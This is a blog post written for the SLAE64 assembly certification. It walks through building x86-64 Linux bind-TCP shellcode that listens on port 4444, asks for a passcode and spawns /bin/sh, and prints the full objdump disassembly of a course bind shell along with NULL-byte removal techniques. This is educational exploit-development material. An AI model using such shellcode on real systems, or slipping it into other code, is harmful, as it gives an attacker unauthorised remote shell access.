The first assignment of the SLAE64 exam states:
- Create a Shell_Bind_TCP shellcode:
- Binds to a port
- Needs a "passcode"
- If passcode is correct then execute a shell
- Remove 0x00 from the Bind TCP shellcode discussed in the course
Shell Bind TCP shellcode
The first assignment is to create a bind TCP shellcode which requires a passcode before it spawns a shell. What should happen when a wrong passcode is entered isn't defined, so I'll just exit with a non-zero return code.
It follows this basic pattern to spawn a shell:
- Allocate a file descriptor through socket()
- Set up the structure defining the address family, address and port to listen to
- Bind the socket with the above parameters
- Listen on the socket for incoming connections
- Upon accepting a connection, duplicate the file descriptors for input/output with dup2()
- Print a password prompt and require the correct password to be entered
- If the password was correct a shell is spawned; otherwise it exits
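As a quick reference, the steps above map onto the x86-64 Linux syscall numbers below. This is a small Python sketch rather than part of the shellcode: the `SYSCALLS` table and the `as_mov` helper are names made up for illustration, and the `read`/`write` entries assume the prompt and passcode are handled with those two syscalls.

```python
# x86-64 Linux syscall numbers for the steps of the bind shell.
SYSCALLS = {
    "socket": 41,
    "bind": 49,
    "listen": 50,
    "accept": 43,
    "dup2": 33,
    "write": 1,    # assumed: used to print the prompt
    "read": 0,     # assumed: used to read the passcode
    "execve": 59,
    "exit": 60,
}


def as_mov(name):
    """Render the naive (NULL-containing) way of loading a syscall number."""
    return f"mov eax, {SYSCALLS[name]:#x}  ; {name}"


for name in SYSCALLS:
    print(as_mov(name))
```

Several of these values (0x29, 0x31, 0x32, 0x2b, 0x21, 0x3b) can be recognised as immediates in the disassembly of the course's shellcode later in this post.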
If this were regular assembly and not shellcode, where size is a constraint, it would be a good habit to check the return code of the syscalls. Most of them return a negative value upon failure, so we can test for a value less than 0 (set in R13 in the example below) and jump to the out label, which will call exit with a non-zero return code to indicate a failure. For example:
    [...]
    syscall
    xor r13, r13
    cmp rax, r13
    jl out

    out:
    mov rax, 60
    mov rdi, 1
    syscall
However, this adds a fair amount of code (8 bytes) for every syscall. So for the sake of this exercise I ignore any errors and hope none of the syscalls fail.
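To see where the 8 bytes come from, here is a rough Python tally of the three extra instructions. It assumes the assembler emits the short (rel8) form of `jl`; the `CHECK` table and `overhead` helper are illustrative names only.

```python
# Encodings of the three extra instructions after each syscall.
# Assumption: the assembler picks the short (rel8) form of jl.
CHECK = {
    "xor r13, r13": bytes.fromhex("4d31ed"),
    "cmp rax, r13": bytes.fromhex("4c39e8"),
    "jl out": bytes.fromhex("7c00"),  # 0x00 is only a placeholder displacement
}

per_syscall = sum(len(code) for code in CHECK.values())


def overhead(num_syscalls):
    """Total number of extra bytes when every syscall gets the check."""
    return per_syscall * num_syscalls


print(per_syscall, overhead(9))
```

With nine syscalls, as in the course's original shellcode, the checks alone would add 72 bytes.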
The passcode handling relies on a simple cmp instruction and whether it sets the zero flag or not. This works because cmp subtracts the operands, and if they were equal the result is zero, so ZF gets set. This means the data we read is equal to the string we stored previously in RBX.
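The comparison can be modelled in a few lines of Python. This is only a sketch: the passcode `p4ssw0rd` is a made-up example, and it assumes the passcode is exactly 8 bytes so that it fits in a single 64-bit register.

```python
MASK64 = (1 << 64) - 1


def as_qword(data):
    """Interpret exactly 8 bytes the way a 64-bit load would (little-endian)."""
    if len(data) != 8:
        raise ValueError("expected exactly 8 bytes")
    return int.from_bytes(data, "little")


def cmp_sets_zf(a, b):
    """Model of cmp: subtract, discard the result, report whether ZF is set."""
    return ((a - b) & MASK64) == 0


PASSCODE = b"p4ssw0rd"      # hypothetical 8-byte passcode
rbx = as_qword(PASSCODE)    # the value stored in RBX beforehand

print(cmp_sets_zf(as_qword(b"p4ssw0rd"), rbx))
print(cmp_sets_zf(as_qword(b"letmein!"), rbx))
```

In the shellcode the same decision is a conditional jump on ZF right after the cmp.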
For me the difficulty in this assignment was to correctly lay out the required structs on the stack without introducing any NULL bytes. The prime example of this is setting up struct sockaddr for the bind() call.
First off, we need to construct the struct (pun intended) in reverse order as we're dealing with the stack. So start by pushing 8 bytes of 0 for sin_zero:
    xor rax, rax
    push rax
Now here comes the key: push another 8 bytes of zero. This ensures the stack space we need is already zeroed out, so the following writes only have to fill in the non-zero fields:
    push rax                    ; Another 8 bytes worth of zero.
                                ; Half of it is for sin_addr.s_addr.
    mov word [rsp+2], 0x5c11    ; Push our port number (4444) onto the stack
    mov byte [rsp], 0x2         ; AF_INET = 2
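To double-check the layout and the odd-looking 0x5c11 immediate, the same 16 bytes can be built in Python. This is a sketch under the usual x86-64 Linux layout of `struct sockaddr_in` (2-byte family, 2-byte port in network byte order, 4-byte address, 8 bytes of padding); the variable names are only illustrative.

```python
import struct

AF_INET = 2
PORT = 4444

# struct sockaddr_in as it ends up in memory:
#   sin_family (2 bytes, host order), sin_port (2 bytes, network order),
#   sin_addr (4 bytes), sin_zero (8 bytes of padding).
sockaddr_in = (
    struct.pack("<H", AF_INET)
    + struct.pack(">H", PORT)
    + bytes(4)   # sin_addr.s_addr = 0 (INADDR_ANY)
    + bytes(8)   # sin_zero
)

# The immediate for `mov word [rsp+2], imm16`: the CPU stores it
# little-endian, so it has to be the byte-swapped port number.
port_imm = int.from_bytes(struct.pack(">H", PORT), "little")

print(sockaddr_in.hex())
print(hex(port_imm))
```

Only the first four bytes are non-zero, which is why zeroing 16 bytes with two pushes and then patching the family and port is enough.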
In the end I decided to add an enter password: prompt as well. Since that string exceeds 8 bytes it had to be pushed onto the stack in two parts.
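Working out the 64-bit immediates for a string by hand is error-prone, so a small helper is handy. The sketch below is not taken from the repository: `push_immediates` is a hypothetical name, and the prompt is assumed to carry a trailing space so that it is exactly 16 bytes long.

```python
def push_immediates(data):
    """Split data into 8-byte chunks and return the qwords in push order."""
    if len(data) % 8:
        raise ValueError("pad the string to a multiple of 8 bytes first")
    chunks = [data[i:i + 8] for i in range(0, len(data), 8)]
    # The stack grows downwards, so the last chunk has to be pushed first.
    return [int.from_bytes(chunk, "little") for chunk in reversed(chunks)]


# Assumed prompt: 15 characters plus a trailing space = 16 bytes.
for value in push_immediates(b"enter password: "):
    print(f"mov rbx, {value:#018x}")
    print("push rbx")
```

Feeding it `b"/bin//sh"` yields the single value 0x68732f2f6e69622f, the same constant the course's shellcode loads into rbx before calling execve.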
The total size of this shellcode is 251 bytes.
Removing 0x00 from the discussed shellcode
The original shellcode contains a fair number of NULLs according to objdump:
    $ objdump -D -M intel BindShell.o

    BindShell.o:     file format elf64-x86-64

    Disassembly of section .text:

    0000000000000000 <_start>:
       0:   b8 29 00 00 00          mov    eax,0x29
       5:   bf 02 00 00 00          mov    edi,0x2
       a:   be 01 00 00 00          mov    esi,0x1
       f:   ba 00 00 00 00          mov    edx,0x0
      14:   0f 05                   syscall
      16:   48 89 c7                mov    rdi,rax
      19:   48 31 c0                xor    rax,rax
      1c:   50                      push   rax
      1d:   89 44 24 fc             mov    DWORD PTR [rsp-0x4],eax
      21:   66 c7 44 24 fa 11 5c    mov    WORD PTR [rsp-0x6],0x5c11
      28:   66 c7 44 24 f8 02 00    mov    WORD PTR [rsp-0x8],0x2
      2f:   48 83 ec 08             sub    rsp,0x8
      33:   b8 31 00 00 00          mov    eax,0x31
      38:   48 89 e6                mov    rsi,rsp
      3b:   ba 10 00 00 00          mov    edx,0x10
      40:   0f 05                   syscall
      42:   b8 32 00 00 00          mov    eax,0x32
      47:   be 02 00 00 00          mov    esi,0x2
      4c:   0f 05                   syscall
      4e:   b8 2b 00 00 00          mov    eax,0x2b
      53:   48 83 ec 10             sub    rsp,0x10
      57:   48 89 e6                mov    rsi,rsp
      5a:   c6 44 24 ff 10          mov    BYTE PTR [rsp-0x1],0x10
      5f:   48 83 ec 01             sub    rsp,0x1
      63:   48 89 e2                mov    rdx,rsp
      66:   0f 05                   syscall
      68:   49 89 c1                mov    r9,rax
      6b:   b8 03 00 00 00          mov    eax,0x3
      70:   0f 05                   syscall
      72:   4c 89 cf                mov    rdi,r9
      75:   b8 21 00 00 00          mov    eax,0x21
      7a:   be 00 00 00 00          mov    esi,0x0
      7f:   0f 05                   syscall
      81:   b8 21 00 00 00          mov    eax,0x21
      86:   be 01 00 00 00          mov    esi,0x1
      8b:   0f 05                   syscall
      8d:   b8 21 00 00 00          mov    eax,0x21
      92:   be 02 00 00 00          mov    esi,0x2
      97:   0f 05                   syscall
      99:   48 31 c0                xor    rax,rax
      9c:   50                      push   rax
      9d:   48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
      a4:   2f 73 68
      a7:   53                      push   rbx
      a8:   48 89 e7                mov    rdi,rsp
      ab:   50                      push   rax
      ac:   48 89 e2                mov    rdx,rsp
      af:   57                      push   rdi
      b0:   48 89 e6                mov    rsi,rsp
      b3:   48 83 c0 3b             add    rax,0x3b
      b7:   0f 05                   syscall
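Spotting the NULLs by eye works for a listing this size, but a few lines of Python make the check repeatable. This is a minimal sketch with a hypothetical `null_offsets` helper; it is fed only the first two instructions of the listing.

```python
def null_offsets(code):
    """Return the offset of every 0x00 byte in a blob of machine code."""
    return [offset for offset, byte in enumerate(code) if byte == 0]


# The first two instructions of the disassembly:
#   b8 29 00 00 00   mov eax,0x29
#   bf 02 00 00 00   mov edi,0x2
code = bytes.fromhex("b829000000" "bf02000000")

print(null_offsets(code))
```

An empty list means the blob is free of NULL bytes, which is the goal for the rewritten shellcode.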
There are a few common patterns we can use to get rid of the NULLs. For example:
    mov eax, 41
can also be expressed as:
    xor rax, rax    ; clear the rax register (effectively zeroing it)
    add rax, 41     ; add 41 to 0
Instead of using the add instruction after clearing the register, we could increment the register value if we need something small like 1 or 2.
Another method is to subtract the register from itself:
    sub rax, rax
    add rax, 41
If we also optimize for size we can take it one step further by using al, which is the lower 8 bits of the 64-bit rax register. This halves the add instruction from four bytes to two:
    04 29          add al,0x29
    48 83 c0 29    add rax,0x29
Additionally, pushing a value onto the stack and then popping it into the destination register is another way to get rid of NULLs, and it often decreases code size too.
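To compare these patterns side by side, the sketch below tallies size and NULL count for each way of loading 41 into rax. The encodings for the mov, xor and add variants are the ones objdump shows in this post; the `sub rax, rax` and `push`/`pop` encodings are added from the instruction set reference, and the `VARIANTS` and `summarize` names are only illustrative.

```python
# Ways to load 41 into rax/eax. The first is the original form,
# the others avoid NULL bytes.
VARIANTS = {
    "mov eax, 41": bytes.fromhex("b829000000"),
    "xor rax, rax; add rax, 41": bytes.fromhex("4831c0" "4883c029"),
    "sub rax, rax; add rax, 41": bytes.fromhex("4829c0" "4883c029"),
    "xor rax, rax; add al, 41": bytes.fromhex("4831c0" "0429"),
    "push 41; pop rax": bytes.fromhex("6a29" "58"),
}


def summarize(code):
    """Return (size in bytes, number of NULL bytes)."""
    return len(code), code.count(0)


for asm, code in VARIANTS.items():
    size, nulls = summarize(code)
    print(f"{asm:<28} {size} bytes, {nulls} NULLs")
```

The push/pop pair comes out smallest at three bytes, while the plain xor/add replacement is actually two bytes larger than the original mov.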
The end result for my clean
It is slightly larger than the original, but I used a variety of ways to zero out and increment registers rather than always choosing the method that generates the smallest amount of code.
I have uploaded my code to jasperla/slae64 on GitHub.
I have also uploaded a helper script I wrote to the repository which helped me in testing and validating the code throughout the course: compile.py (requires Python 3.6).
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
Student ID: SLAE64-1614